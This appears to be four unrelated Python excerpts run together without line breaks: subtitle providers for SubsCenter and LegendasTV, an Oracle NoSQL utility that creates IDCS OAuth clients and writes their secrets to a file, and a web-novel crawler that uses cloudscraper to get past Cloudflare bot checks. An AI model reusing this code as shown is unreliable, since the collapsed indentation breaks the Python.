order subtitles[subtitle_id].downloaded += downloaded continue # otherwise create it subtitle = SubsCenterSubtitle( language, hearing_impaired, page_link, series, season, episode, title, subtitle_id, subtitle_key, downloaded, [release]) logger.debug('Found subtitle %r', subtitle) subtitles[subtitle_id] = subtitle return subtitles.values() def list_subtitles(self, video, languages): series = None season = None episode = None title = video.title if isinstance(video, Episode): series = video.series season = video.season episode = video.episode return [ s for s in self.query(series, season, episode, title) if s.language in languages ] def download_subtitle(self, subtitle): # download url = self.server + 'subtitle/download/{}/{}/'.format( subtitle.language.alpha2, subtitle.subtitle_id) params = {'v': subtitle.releases[0], 'key': subtitle.subtitle_key} r = self.session.get(url, params=params, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() # open the zip with zipfile.ZipFile(io.BytesIO(r.content)) as zf: # remove some filenames from the namelist namelist = [n for n in zf.namelist() if not n.endswith('.txt')] if len(namelist) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(namelist[0]))
class OAuthClient(object): """ Cloud service only. Utility to create a custom OAuth client. To connect and authenticate to the Oracle NoSQL Database Cloud Service, a client needs to acquire an access token from Oracle Identity Cloud Service (IDCS). As a prerequisite, a custom OAuth client named *NoSQLClient* must be created first using this utility. This custom client needs to be created only once for a tenant. This utility needs a valid access token in a token file that can be downloaded from the IDCS admin console. After logging into the IDCS admin console, choose *Applications* from the button on the top left. Find the Application named *ANDC*, click the button *Generate Access Token*, in the pop-up window, pick *Invoke Identity Cloud Service APIs* under *Customized Scopes*. Click on *Download Token* and a token file will be generated and downloaded. Note that this token has a lifetime of one hour. After the token file has been downloaded, run this utility to complete the OAuth Client creation: .. code-block:: shell python oauth_client.py -create -idcs_url <tenant-specific IDCS URL> \ -token <token file> The tenant-specific IDCS URL is the IDCS host assigned to the tenant. After logging into the IDCS admin console, copy the host of the IDCS admin console URL. For example, the format of the admin console URL is "https\://{tenantId}.identity.oraclecloud.com/ui/v1/adminconsole". The "https\://{tenantId}.identity.oraclecloud.com" portion is the required parameter. After creation, the utility will print out *NoSQLClient is created*. The OAuth client id and secret will also be printed out. A credentials file template *credentials.tmp* with client id an secret will be generated at the working directory by default. Use *-credsdir* to specify different directory. This utility also can be used to delete this custom OAuth client in case the creation process failed unexpectedly. .. code-block:: shell python oauth_client.py -delete -idcs_url <tenant-specific IDCS URL> \ -token <token file> In addition, this utility can be used to verify if OAuth client is configured properly, for example .. code-block:: shell python oauth_client.py -verify -idcs_url <tenant-specific IDCS URL> \ -token <token file> """ # # NOTE: above is simple doc. This information is on the implementation. # This custom OAuth client must be created with a specified name. The client # must: # - enable password, client_credentials as allowed grants # - have PSM and NDCS fully-qualified scopes (FQS) as allowed scopes # - have ANDC_FullAccessRole # # The OAuth client creation steps are: # 1. Find PSM and NDCS primary audiences from IDCS # 2. Build PSM and NDCS FQS with primary audiences, put in the OAuth \ # client JSON payload # 3. POST <idcs_url>/admin/v1/Apps with OAuth client JSON payload # 4. Find role ID of ANDC_FullAccessRole # 5. Grant ANDC_FullAccessRole to created custom OAuth client # # Default OAuth client name _DEFAULT_NAME = 'NoSQLClient' # Default credentials template file name _CREDS_TMP = 'credentials.temp' # Endpoint with filter used to get PSM App _PSM_APP_EP = (Utils.APP_ENDPOINT + '?filter=serviceTypeURN+eq+%22PSMResourceTenatApp%22') # Endpoint with filter used to get ANDC App _ANDC_APP_EP = (Utils.APP_ENDPOINT + '?filter=serviceTypeURN+eq+%22' + 'ANDC_ServiceEntitlement%22+and+isOAuthResource+eq+true') # Endpoint with filter used to get role ID of ANDC_FullAccessRole _ANDC_ROLE_EP = (Utils.ROLE_ENDPOINT + '?filter=displayName+eq+%22ANDC_FullAccessRole%22') # Endpoint with filter used to get oauth client _CLIENT_EP = Utils.APP_ENDPOINT + '?filter=displayName+eq+%22' # JSON used to create custom OAuth client _CLIENT = ( '{{"displayName": "{0}","isOAuthClient": true,' + '"isOAuthResource": false,"isUnmanagedApp": true,"active": true,' + '"description": "Custom OAuth Client for application access to ' + 'NoSQL Database Cloud Service","clientType": "confidential",' + '"allowedGrants": ["password", "client_credentials"]' + ',"trustScope": "Explicit","allowedScopes": [' + '{{"fqs": "{1}"}},{{"fqs": "{2}"}}],' + '"schemas": ["urn:ietf:params:scim:schemas:oracle:idcs:App"],' + '"basedOnTemplate": {{"value": "CustomWebAppTemplateId"}}}}') # JSON used to grant role to client _GRANT = ( '{{"app": {{"value": "{0}"}},"entitlement": {{' + '"attributeName": "appRoles","attributeValue": "{1}"}},' + '"grantMechanism": "ADMINISTRATOR_TO_APP",' + '"grantee": {{"value": "{2}","type": "App"}},' + '"schemas": ["urn:ietf:params:scim:schemas:oracle:idcs:Grant"]}}') _DEACTIVATE = ( '{"active": false,"schemas": [' + '"urn:ietf:params:scim:schemas:oracle:idcs:AppStatusChanger"]}') # Main argument flags _IDCS_URL_FLAG = '-idcs_url' _TOKEN_FILE_FLAG = '-token' _CREATE_FLAG = '-create' _DELETE_FLAG = '-delete' _VERIFY_FLAG = '-verify' _NAME_FLAG = '-name' _DIR_FLAG = '-credsdir' _TIMEOUT_FLAG = '-timeout' _VERBOSE_FLAG = '-verbose' def __init__(self): self._parse_args() url = urlparse(self._idcs_url) self._host = url.hostname # logger used for HTTP request logging self._logger = self._get_logger() self._logutils = LogUtils(self._logger) self._sess = Session() self._request_utils = RequestUtils(self._sess, self._logutils) def execute_commands(self): # noinspection PyBroadException try: if self._delete: self._do_delete() elif self._create: self._do_create() else: errors = list() self._do_verify(errors) if len(errors) != 0: print('Verification failed: ') for err in errors: print(err) except Exception: print(format_exc()) finally: if self._sess is not None: self._sess.close() def _add_app(self, auth, payload): # Add the custom OAuth client response = self._request_utils.do_post_request( self._idcs_url + Utils.APP_ENDPOINT, Utils.scim_headers(self._host, auth), payload, self._timeout_ms) self._check_not_none(response, 'response of adding OAuth client') response_code = response.get_status_code() content = response.get_content() if response_code == codes.conflict: raise IllegalStateException( 'OAuth Client ' + self._name + ' already exists. To recreate,' + ' run with ' + OAuthClient._DELETE_FLAG + '. To verify if ' + 'existing client is configured correctly, run with ' + OAuthClient._VERIFY_FLAG) elif response_code >= codes.multiple_choices: OAuthClient._idcs_errors(response, 'Adding custom client') app_id = 'id' oauth_id = 'name' secret = 'clientSecret' app_id_value = Utils.get_field(content, app_id) oauth_id_value = Utils.get_field(content, oauth_id) secret_value = Utils.get_field(content, secret) if (app_id_value is None or oauth_id_value is None or secret_value is None): raise IllegalStateException( str.format('Unable to find {0} or {1} or {2} in ,' + content, app_id, oauth_id, secret)) return OAuthClient.Client(app_id_value, oauth_id_value, secret_value) def _check_not_none(self, response, action): if response is None: raise IllegalStateException( 'Error ' + action + ' from Oracle Identity Cloud Service, ' + 'no response') def _creds_template(self, client_id, secret): file_dir = ((path.abspath(path.dirname(argv[0])) if self._temp_file_dir is None else self._temp_file_dir) + sep + OAuthClient._CREDS_TMP) if path.exists(file_dir): remove(file_dir) with open(file_dir, 'w') as f: if client_id is not None: f.write(PropertiesCredentialsProvider.CLIENT_ID_PROP + '=' + client_id + '\n') f.write(PropertiesCredentialsProvider.CLIENT_SECRET_PROP + '=' + secret + '\n') f.write(PropertiesCredentialsProvider.USER_NAME_PROP + '=\n') f.write(PropertiesCredentialsProvider.PWD_PROP + '=\n') return file_dir def _deactivate_app(self, auth, app_id): # Deactivate OAuth client response = self._request_utils.do_put_request( self._idcs_url + Utils.STATUS_ENDPOINT + sep + app_id, Utils.scim_headers(self._host, auth), OAuthClient._DEACTIVATE, self._timeout_ms) self._check_not_none(response, 'response of deactivating OAuth client') if codes.ok <= response.get_status_code() < codes.multiple_choices: return OAuthClient._idcs_errors(response, 'deactivating OAuth client ' + self._name) def _do_create(self): self._output('Creating OAuth Client ' + self._name) try: # Find PSM and ANDC fqs auth = 'Bearer ' + self._get_bootstrap_token() psm_fqs = self._get_psm_audience(auth) + Utils.PSM_SCOPE andc = self._get_andc_info(auth) andc_fqs = andc.audience + AccessTokenProvider.SCOPE self._log_verbose('Found scopes ' + psm_fqs + ', ' + andc_fqs) # Add custom client add_app = OAuthClient._CLIENT.format(self._name, psm_fqs, andc_fqs) client_info = self._add_app(auth, add_app) self._log_verbose('Added OAuth client ' + self._name) # Find ANDC role id role_id = self._get_id(auth, self._idcs_url + OAuthClient._ANDC_ROLE_EP, 'role') self._log_verbose('Found role id ' + role_id) # Grant ANDC_FullAccessRole to custom client grant = OAuthClient._GRANT.format(andc.app_id, role_id, client_info.app_id) self._grant_role(auth, grant) self._log_verbose('Granted role to OAuth client') self._output(self._name + ' is created\nClient ID: ' + client_info.oauth_id + '\nClient secret: ' + client_info.secret) creds_path = self._creds_template(client_info.oauth_id, client_info.secret) self._output('Credential template file ' + creds_path) except Exception as e: self._output('Failed to create OAuth client ' + self._name) raise e def _do_delete(self): self._output('Deleting OAuth Client ' + self._name) try: auth = 'Bearer ' + self._get_bootstrap_token() # Find OAuth client AppId app_id = self._get_id( auth, self._idcs_url + OAuthClient._CLIENT_EP + self._name + '%22', 'client') self._log_verbose('Found OAuth client AppId: ' + app_id) # Deactivate the OAuth client self._deactivate_app(auth, app_id) self._log_verbose('OAuth client deactivated') # Remove the OAuth client self._remove_client(auth, app_id) self._output(self._name + ' is deleted') except Exception as e: self._output('Failed to remove OAuth client ' + self._name) raise e def _do_verify(self, errors): self._output('Verifying OAuth Client ' + self._name) try: auth = 'Bearer ' + self._get_bootstrap_token() response = self._request_utils.do_get_request( self._idcs_url + OAuthClient._CLIENT_EP + self._name + '%22', Utils.scim_headers(self._host, auth), self._timeout_ms) self._check_not_none(response, 'client metadata') response_code = response.get_status_code() content = response.get_content() if response_code >= codes.multiple_choices: OAuthClient._idcs_errors(response, 'Getting client ' + self._name) grants = Utils.get_field(content, 'allowedGrants') if grants is None: # No results in response raise IllegalStateException( 'OAuth Client ' + self._name + ' doesn\'t exist, or the ' + 'token file is invalid, user who downloads the token ' + 'must have Identity Domain Administrator role') # Verify if client has required grants self._verify_grants(grants, errors) # Verify if client has PSM and ANDC FQS self._verify_scopes( Utils.get_field(content, 'allowedScopes', 'fqs'), errors) # Verify if client has ANDC role self._verify_role( Utils.get_field(content, 'grantedAppRoles', 'display'), errors) if len(errors) > 0: return self._output('Verification succeed') except Exception as e: self._output('Verification failed of OAuth client ' + self._name) raise e def _get_andc_info(self, auth): # Get App ANDC metadata from IDCS response = self._request_utils.do_get_request( self._idcs_url + OAuthClient._ANDC_APP_EP, Utils.scim_headers(self._host, auth), self._timeout_ms) self._check_not_none(response, 'getting service metadata') content = response.get_content() if response.get_status_code() >= codes.multiple_choices: OAuthClient._idcs_errors(response, 'Getting service metadata') audience = 'audience' app_id = 'id' audience_value = Utils.get_field(content, audience) app_id_value = Utils.get_field(content, app_id) if audience_value is None or app_id_value is None: raise IllegalStateException( str.format('Unable to find {0} or {1} in ,' + content, audience, app_id)) return OAuthClient.ANDC(app_id_value, audience_value) def _get_bootstrap_token(self): # Read access token from given file with open(self._at_file, 'r') as at_file: content = at_file.read() bootstrap_token = loads(content) field = 'app_access_token' app_access_token = bootstrap_token.get(field) if app_access_token is None: raise IllegalStateException( 'Access token file contains invalid value: ' + content) return app_access_token def _get_id(self, auth, url, resource): response = self._request_utils.do_get_request( url, Utils.scim_headers(self._host, auth), self._timeout_ms) self._check_not_none(response, 'getting ' + resource + ' id') if response.get_status_code() >= codes.multiple_choices: OAuthClient._idcs_errors(response, 'Getting id of ' + resource) return str( Utils.get_field(response.get_content(), 'id', allow_none=False)) def _get_logger(self): """ Returns the logger used for OAuthClient. """ logger = getLogger(self.__class__.__name__) if self._verbose: logger.setLevel(WARNING) else: logger.setLevel(INFO) log_dir = (path.abspath(path.dirname(argv[0])) + sep + 'logs') if not path.exists(log_dir): mkdir(log_dir) logger.addHandler(FileHandler(log_dir + sep + 'oauth.log')) return logger def _get_psm_audience(self, auth): response = self._request_utils.do_get_request( self._idcs_url + OAuthClient._PSM_APP_EP, Utils.scim_headers(self._host, auth), self._timeout_ms) self._check_not_none(response, 'getting account metadata') if response.get_status_code() >= codes.multiple_choices: OAuthClient._idcs_errors(response, 'Getting account metadata') return str( Utils.get_field(response.get_content(), 'audience', allow_none=False)) def _grant_role(self, auth, payload): # Grant ANDC_FullAccessRole to OAuth client response = self._request_utils.do_post_request( self._idcs_url + Utils.GRANT_ENDPOINT, Utils.scim_headers(self._host, auth), payload, self._timeout_ms) self._check_not_none(response, ' response of granting role') if codes.ok <= response.get_status_code() < codes.multiple_choices: return OAuthClient._idcs_errors(response, 'Granting required role to client') def _log_verbose(self, msg): if self._verbose: print(msg) def _output(self, msg): print(msg) def _parse_args(self): parser = ArgumentParser(prog='OAuthClient') parser.add_argument(OAuthClient._IDCS_URL_FLAG, required=True, help='The idcs_url.', metavar='<tenant-base IDCS URL>') parser.add_argument( OAuthClient._TOKEN_FILE_FLAG, required=True, help='The path of the token get from IDCS admin console.', metavar='<access token file path>') parser.add_argument(OAuthClient._NAME_FLAG, default=OAuthClient._DEFAULT_NAME, help='The OAuth Client name.', metavar='<client name> default: NoSQLClient') parser.add_argument( OAuthClient._DIR_FLAG, help='The directory for generating the credentials file template.', metavar=('<credentials template directory path> ' + 'default: current dir')) parser.add_argument(OAuthClient._TIMEOUT_FLAG, type=int, default=Utils.DEFAULT_TIMEOUT_MS, help='The timeout.', metavar='<request timeout> default: 12000 ms') parser.add_argument(OAuthClient._CREATE_FLAG, action='store_true', help='To create the OAuth Client.') parser.add_argument(OAuthClient._DELETE_FLAG, action='store_true', help='To delete the OAuth Client.') parser.add_argument(OAuthClient._VERIFY_FLAG, action='store_true', help='To verify the OAuth Client.') parser.add_argument(OAuthClient._VERBOSE_FLAG, action='store_true', help='To log verbose information.') args = parser.parse_args() self._idcs_url = args.idcs_url self._at_file = args.token self._name = args.name self._temp_file_dir = args.credsdir self._timeout_ms = args.timeout self._create = args.create self._delete = args.delete self._verify = args.verify self._verbose = args.verbose if not (self._create or self._delete or self._verify): parser.error('Missing required argument ' + OAuthClient._CREATE_FLAG + ' | ' + OAuthClient._DELETE_FLAG + ' | ' + OAuthClient._VERIFY_FLAG) def _remove_client(self, auth, app_id): response = self._request_utils.do_delete_request( self._idcs_url + Utils.APP_ENDPOINT + sep + app_id, Utils.scim_headers(self._host, auth), self._timeout_ms) self._check_not_none(response, 'response of deleting OAuth client') if codes.ok <= response.get_status_code() < codes.multiple_choices: return OAuthClient._idcs_errors(response, 'removing OAuth client ' + self._name) def _verify_grants(self, grants, errors): self._log_verbose('OAuth client allowed grants: ' + str(grants)) match = 0 for grant in grants: if (grant.lower() == 'password' or grant.lower() == 'client_credentials'): match += 1 if match != 2: errors.append( 'Missing required allowed grants, require Resource ' + 'Owner and Client Credentials') self._log_verbose('Grants verification succeed') def _verify_role(self, roles, errors): if roles is None: raise IllegalStateException('OAuth client ' + self._name + ' doesn\'t have roles') self._log_verbose('OAuth client allowed roles: ' + str(roles)) match = 0 for role in roles: if role == 'ANDC_FullAccessRole': match += 1 if match != 1: errors.append('Missing required role ANDC_FullAccessRole') self._log_verbose('Role verification succeed') def _verify_scopes(self, fqs_list, errors): self._log_verbose('OAuth client allowed scopes: ' + str(fqs_list)) match = 0 for fqs in fqs_list: if Utils.PSM_SCOPE in fqs or AccessTokenProvider.SCOPE in fqs: match += 1 if match != 2: errors.append('Missing required OAuth scopes, client only have ' + str(fqs_list)) self._log_verbose('Scope verification succeed') @staticmethod def _idcs_errors(response, action): Utils.handle_idcs_errors( response, action, ' Access token in the token file expired,' + ' or the token file is generated with incorrect scopes,' + ' requires Identity Domain Administrator') class ANDC(object): def __init__(self, app_id, audience): self.app_id = app_id self.audience = audience class Client(object): def __init__(self, app_id, oauth_id, secret): self.app_id = app_id self.oauth_id = oauth_id self.secret = secret
class LegendasTVProvider(Provider): """LegendasTV Provider. :param str username: username. :param str password: password. """ languages = { Language.fromlegendastv(l) for l in language_converters['legendastv'].codes } server_url = 'http://legendas.tv/' subtitle_class = LegendasTVSubtitle def __init__(self, username=None, password=None): # Provider needs UNRAR installed. If not available raise ConfigurationError try: rarfile.custom_check(rarfile.UNRAR_TOOL) except rarfile.RarExecError: raise ConfigurationError('UNRAR tool not available') if any((username, password)) and not all((username, password)): raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False self.session = None def initialize(self): self.session = Session() self.session.headers[ 'User-Agent'] = 'Subliminal/%s' % __short_version__ # login if self.username and self.password: logger.info('Logging in') data = { '_method': 'POST', 'data[User][username]': self.username, 'data[User][password]': self.password } r = self.session.post(self.server_url + 'login', data, allow_redirects=False, timeout=10) raise_for_status(r) soup = ParserBeautifulSoup(r.content, ['html.parser']) if soup.find('div', {'class': 'alert-error'}, string=re.compile(u'Usuário ou senha inválidos')): raise AuthenticationError(self.username) logger.debug('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get(self.server_url + 'users/logout', allow_redirects=False, timeout=10) raise_for_status(r) logger.debug('Logged out') self.logged_in = False self.session.close() @staticmethod def is_valid_title(title, title_id, sanitized_title, season, year): """Check if is a valid title.""" sanitized_result = sanitize(title['title']) if sanitized_result != sanitized_title: logger.debug("Mismatched title, discarding title %d (%s)", title_id, sanitized_result) return # episode type if season: # discard mismatches on type if title['type'] != 'episode': logger.debug( "Mismatched 'episode' type, discarding title %d (%s)", title_id, sanitized_result) return # discard mismatches on season if 'season' not in title or title['season'] != season: logger.debug('Mismatched season %s, discarding title %d (%s)', title.get('season'), title_id, sanitized_result) return # movie type else: # discard mismatches on type if title['type'] != 'movie': logger.debug( "Mismatched 'movie' type, discarding title %d (%s)", title_id, sanitized_result) return # discard mismatches on year if year is not None and 'year' in title and title['year'] != year: logger.debug("Mismatched movie year, discarding title %d (%s)", title_id, sanitized_result) return return True @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME, should_cache_fn=lambda value: value) def search_titles(self, title, season, title_year): """Search for titles matching the `title`. For episodes, each season has it own title :param str title: the title to search for. :param int season: season of the title :param int title_year: year of the title :return: found titles. :rtype: dict """ titles = {} sanitized_titles = [sanitize(title)] ignore_characters = {'\'', '.'} if any(c in title for c in ignore_characters): sanitized_titles.append( sanitize(title, ignore_characters=ignore_characters)) for sanitized_title in sanitized_titles: # make the query if season: logger.info('Searching episode title %r for season %r', sanitized_title, season) else: logger.info('Searching movie title %r', sanitized_title) r = self.session.get(self.server_url + 'legenda/sugestao/{}'.format(sanitized_title), timeout=10) raise_for_status(r) results = json.loads(r.text) # loop over results for result in results: source = result['_source'] # extract id title_id = int(source['id_filme']) # extract type title = {'type': type_map[source['tipo']]} # extract title, year and country name, year, country = title_re.match( source['dsc_nome']).groups() title['title'] = name # extract imdb_id if source['id_imdb'] != '0': if not source['id_imdb'].startswith('tt'): title['imdb_id'] = 'tt' + source['id_imdb'].zfill(7) else: title['imdb_id'] = source['id_imdb'] # extract season if title['type'] == 'episode': if source['temporada'] and source['temporada'].isdigit(): title['season'] = int(source['temporada']) else: match = season_re.search(source['dsc_nome_br']) if match: title['season'] = int(match.group('season')) else: logger.debug( 'No season detected for title %d (%s)', title_id, name) # extract year if year: title['year'] = int(year) elif source['dsc_data_lancamento'] and source[ 'dsc_data_lancamento'].isdigit(): # year is based on season air date hence the adjustment title['year'] = int( source['dsc_data_lancamento']) - title.get( 'season', 1) + 1 # add title only if is valid # Check against title without ignored chars if self.is_valid_title(title, title_id, sanitized_titles[0], season, title_year): titles[title_id] = title logger.debug('Found %d titles', len(titles)) return titles @region.cache_on_arguments( expiration_time=timedelta(minutes=15).total_seconds()) def get_archives(self, title_id, language_code, title_type, season, episode): """Get the archive list from a given `title_id`, `language_code`, `title_type`, `season` and `episode`. :param int title_id: title id. :param int language_code: language code. :param str title_type: episode or movie :param int season: season :param int episode: episode :return: the archives. :rtype: list of :class:`LegendasTVArchive` """ archives = [] page = 0 while True: # get the archive page url = self.server_url + 'legenda/busca/-/{language}/-/{page}/{title}'.format( language=language_code, page=page, title=title_id) r = self.session.get(url) raise_for_status(r) # parse the results soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) for archive_soup in soup.select( 'div.list_element > article > div > div.f_left'): # create archive archive = LegendasTVArchive( archive_soup.a['href'].split('/')[2], archive_soup.a.text, 'pack' in archive_soup.parent['class'], 'destaque' in archive_soup.parent['class'], self.server_url + archive_soup.a['href'][1:]) # clean name of path separators and pack flags clean_name = archive.name.replace('/', '-') if archive.pack and clean_name.startswith('(p)'): clean_name = clean_name[3:] # guess from name guess = guessit(clean_name, {'type': title_type}) # episode if season and episode: # discard mismatches on episode in non-pack archives # Guessit may return int for single episode or list for multi-episode # Check if archive name has multiple episodes releases on it if not archive.pack and 'episode' in guess: wanted_episode = set(episode) if isinstance( episode, list) else {episode} archive_episode = guess['episode'] if isinstance( guess['episode'], list) else {guess['episode']} if not wanted_episode.intersection(archive_episode): logger.debug( 'Mismatched episode %s, discarding archive: %s', guess['episode'], clean_name) continue # extract text containing downloads, rating and timestamp data_text = archive_soup.find('p', class_='data').text # match downloads archive.downloads = int( downloads_re.search(data_text).group('downloads')) # match rating match = rating_re.search(data_text) if match: archive.rating = int(match.group('rating')) # match timestamp and validate it time_data = { k: int(v) for k, v in timestamp_re.search( data_text).groupdict().items() } archive.timestamp = pytz.timezone( 'America/Sao_Paulo').localize(datetime(**time_data)) if archive.timestamp > datetime.utcnow().replace( tzinfo=pytz.utc): raise ProviderError('Archive timestamp is in the future') # add archive logger.info( 'Found archive for title %d and language %d at page %s: %s', title_id, language_code, page, archive) archives.append(archive) # stop on last page if soup.find('a', attrs={'class': 'load_more'}, string='carregar mais') is None: break # increment page count page += 1 logger.debug('Found %d archives', len(archives)) return archives def download_archive(self, archive): """Download an archive's :attr:`~LegendasTVArchive.content`. :param archive: the archive to download :attr:`~LegendasTVArchive.content` of. :type archive: :class:`LegendasTVArchive` """ logger.info('Downloading archive %s', archive.id) r = self.session.get(self.server_url + 'downloadarquivo/{}'.format(archive.id)) raise_for_status(r) # open the archive archive_stream = io.BytesIO(r.content) if is_rarfile(archive_stream): logger.debug('Identified rar archive') archive.content = RarFile(archive_stream) elif is_zipfile(archive_stream): logger.debug('Identified zip archive') archive.content = ZipFile(archive_stream) else: raise ValueError('Not a valid archive') def query(self, language, title, season=None, episode=None, year=None): # search for titles titles = self.search_titles(title, season, year) subtitles = [] # iterate over titles for title_id, t in titles.items(): logger.info('Getting archives for title %d and language %d', title_id, language.legendastv) archives = self.get_archives(title_id, language.legendastv, t['type'], season, episode) if not archives: logger.info('No archives found for title %d and language %d', title_id, language.legendastv) # iterate over title's archives for a in archives: # compute an expiration time based on the archive timestamp expiration_time = (datetime.utcnow().replace(tzinfo=pytz.utc) - a.timestamp).total_seconds() # attempt to get the releases from the cache cache_key = releases_key.format(archive_id=a.id, archive_name=a.name) releases = region.get(cache_key, expiration_time=expiration_time) # the releases are not in cache or cache is expired if releases == NO_VALUE: logger.info('Releases not found in cache') # download archive self.download_archive(a) # extract the releases releases = [] for name in a.content.namelist(): # discard the legendastv file if name.startswith('Legendas.tv'): continue # discard hidden files if os.path.split(name)[-1].startswith('.'): continue # discard non-subtitle files if not name.lower().endswith(SUBTITLE_EXTENSIONS): continue releases.append(name) # cache the releases region.set(cache_key, releases) # iterate over releases for r in releases: subtitle = self.subtitle_class(language, t['type'], t['title'], t.get('year'), t.get('imdb_id'), t.get('season'), a, r) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): season = episode = None if isinstance(video, Episode): titles = [video.series] + video.alternative_series season = video.season episode = video.episode else: titles = [video.title] + video.alternative_titles for title in titles: subtitles = [ s for l in languages for s in self.query( l, title, season=season, episode=episode, year=video.year) ] if subtitles: return subtitles return [] def download_subtitle(self, subtitle): # download archive in case we previously hit the releases cache and didn't download it if subtitle.archive.content is None: self.download_archive(subtitle.archive) # extract subtitle's content subtitle.content = fix_line_ending( subtitle.archive.content.read(subtitle.name))
class Crawler: '''Blueprint for creating new crawlers''' def __init__(self): self._destroyed = False self.executor = futures.ThreadPoolExecutor(max_workers=3) # Initialize cloudscrapper try: self.scraper = cloudscraper.create_scraper(browser={ 'platform': 'linux', 'mobile': False }) except Exception as err: logger.exception('Failed to initialize cloudscraper') self.scraper = Session() # end try # Must resolve these fields inside `read_novel_info` self.novel_title = 'N/A' self.novel_author = 'N/A' self.novel_cover = None self.is_rtl = False # Each item must contain these keys: # `id` - 1 based index of the volume # `title` - the volume title (can be ignored) self.volumes = [] # Each item must contain these keys: # `id` - 1 based index of the chapter # `title` - the title name # `volume` - the volume id of this chapter # `volume_title` - the volume title (can be ignored) # `url` - the link where to download the chapter self.chapters = [] # Other stuffs - not necessary to resolve from crawler instance. self.home_url = '' self.novel_url = '' self.last_visited_url = None # end def def destroy(self): self._destroyed = True self.volumes.clear() self.chapters.clear() self.scraper.close() self.executor.shutdown(False) # end def # ------------------------------------------------------------------------- # # Implement these methods # ------------------------------------------------------------------------- # @abstractmethod def initialize(self): pass # end def @abstractmethod def login(self, email, password): pass # end def @abstractmethod def logout(self): pass # end def @abstractmethod def search_novel(self, query): '''Gets a list of results matching the given query''' pass # end def @abstractmethod def read_novel_info(self): '''Get novel title, autor, cover etc''' pass # end def @abstractmethod def download_chapter_body(self, chapter): '''Download body of a single chapter and return as clean html format.''' pass # end def def get_chapter_index_of(self, url): '''Return the index of chapter by given url or 0''' url = (url or '').strip().strip('/') for chapter in self.chapters: if chapter['url'] == url: return chapter['id'] # end if # end for return 0 # end def # ------------------------------------------------------------------------- # # Helper methods to be used # ------------------------------------------------------------------------- # @property def headers(self): return self.scraper.headers.copy() # end def @property def cookies(self): return {x.name: x.value for x in self.scraper.cookies} # end def def absolute_url(self, url, page_url=None): url = (url or '').strip() if not page_url: page_url = self.last_visited_url # end if if not url or len(url) == 0: return None elif url.startswith('//'): return self.home_url.split(':')[0] + ':' + url elif url.find('//') >= 0: return url elif url.startswith('/'): return self.home_url + url[1:] elif page_url: return page_url.strip('/') + '/' + url else: return self.home_url + url # end if # end def def is_relative_url(self, url): page = urlparse(self.novel_url) url = urlparse(url) return (page.hostname == url.hostname and url.path.startswith(page.path)) # end def def get_response(self, url, **kargs): if self._destroyed: return None # end if kargs = kargs or dict() # kargs['verify'] = kargs.get('verify', False) kargs['timeout'] = kargs.get('timeout', 150) # in seconds self.last_visited_url = url.strip('/') response = self.scraper.get(url, **kargs) response.encoding = 'utf-8' self.cookies.update({x.name: x.value for x in response.cookies}) response.raise_for_status() return response # end def def submit_form(self, url, data={}, multipart=False, headers={}): '''Submit a form using post request''' if self._destroyed: return None # end if headers.update({ 'Content-Type': 'multipart/form-data' if multipart else 'application/x-www-form-urlencoded; charset=UTF-8', }) response = self.scraper.post(url, data=data, headers=headers) response.encoding = 'utf-8' self.cookies.update({x.name: x.value for x in response.cookies}) response.raise_for_status() return response # end def def get_soup(self, *args, **kwargs): parser = kwargs.pop('parser', None) response = self.get_response(*args, **kwargs) return self.make_soup(response, parser) # end def def make_soup(self, response, parser=None): html = response.content.decode('utf-8', 'ignore') soup = BeautifulSoup(html, parser or 'lxml') if not soup.find('body'): raise ConnectionError('HTML document was not loaded properly') # end if return soup # end def def get_json(self, *args, **kargs): response = self.get_response(*args, **kargs) return response.json() # end def def download_cover(self, output_file): response = self.get_response(self.novel_cover) with open(output_file, 'wb') as f: f.write(response.content) # end with # end def # ------------------------------------------------------------------------- # blacklist_patterns = [ r'^[\W\D]*(volume|chapter)[\W\D]+\d+[\W\D]*$', ] bad_tags = [ 'noscript', 'script', 'iframe', 'form', 'hr', 'img', 'ins', 'button', 'input', 'amp-auto-ads', 'pirate' ] block_tags = ['h3', 'div', 'p'] def is_blacklisted(self, text): if len(text.strip()) == 0: return True # end if for pattern in self.blacklist_patterns: if re.search(pattern, text, re.IGNORECASE): return True # end if # end for return False # end def def clean_contents(self, div): if not div: return div # end if div.attrs = {} for tag in div.find_all(True): if isinstance(tag, Comment): tag.extract() # Remove comments elif tag.name == 'br': next_tag = getattr(tag, 'next_sibling') if next_tag and getattr(next_tag, 'name') == 'br': tag.extract() # end if elif tag.name in self.bad_tags: tag.extract() # Remove bad tags elif not tag.text.strip(): tag.extract() # Remove empty tags elif self.is_blacklisted(tag.text): tag.extract() # Remove blacklisted contents elif hasattr(tag, 'attrs'): tag.attrs = {} # Remove attributes # end if # end for return div # end def def extract_contents(self, tag, level=0): body = [] if level == 0: self.clean_contents(tag) # end if for elem in tag.contents: if self.block_tags.count(elem.name): body += self.extract_contents(elem, level + 1) continue # end if text = '' if not elem.name: text = str(elem).strip() else: text = '<%s>%s</%s>' text = text % (elem.name, elem.text.strip(), elem.name) # end if if text: body.append(text) # end if # end for if level > 0: return body else: return [x for x in body if len(x.strip())] # end if # end def def cleanup_text(self, text): return re.sub(u'[⺀-⺙⺛-⻳⼀-⿕々〇〡-〩〸-〺〻㐀-䶵一-鿃豈-鶴侮-頻並-龎]', '', str(text), flags=re.UNICODE)
